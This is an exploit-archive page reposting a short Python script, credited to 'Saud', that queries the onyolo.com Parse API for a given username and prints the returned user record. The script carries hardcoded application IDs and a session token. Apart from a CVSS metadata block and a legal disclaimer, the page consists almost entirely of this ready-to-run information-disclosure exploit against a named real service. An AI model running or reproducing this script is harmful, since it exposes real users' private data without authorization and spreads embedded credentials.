Advertisement






onyolo.com user private information disclose

CVE Category Price Severity
N/A CWE-XXXX N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2020-08-10
CPE
cpe:cpe:/o:exploit:alert:1.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020080045

Below is a copy:

onyolo.com user private information disclose
import requests
import sys

try:
    user = sys.argv[1]
except IndexError:
    print ("usage python3 " + sys.argv[0] + " YoloUserName")
    sys.exit(2)

url = "http://onyolo.com/parse/classes/_User/"+user

print("""
                                                                
                                                      
                                                      
                                                                    
                                                             
                                                             
                                                               
                                                                       
                                                
                                               
                                                       
                                                                                         
                               
               
                    
                                                           
                                            
                                             
                                             
                                                              
                             
                         
                                       
                                                                                        By Saud & https://t.me/x0Saudi  
    """)

payload = ""
headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 
    "X-Parse-Installation-Id": "25cfde8f-7204-434e-a7fb-dde295ee4f70", 
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36", 
    "Connection": "close", 
    "X-Parse-Application-Id": "RTE8CXsUiVWfG1XlXOyJAxfonvt", 
    "Host": "onyolo.com", 
    "Accept-Encoding": "gzip, deflate", 
    "Upgrade-Insecure-Requests": "1", 
    "Accept-Language": "en-US,en;q=0.9", 
    "X-Parse-Client-Version": "i1.17.3", 
    "X-Parse-Session-Token": "r:4b71c2de73f5b1b1671c93107fa379f7", 
    "X-Parse-OS-Version": "12.9 (saud)"
}

response = requests.request("GET", url, data=payload, headers=headers)

print(response.text)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum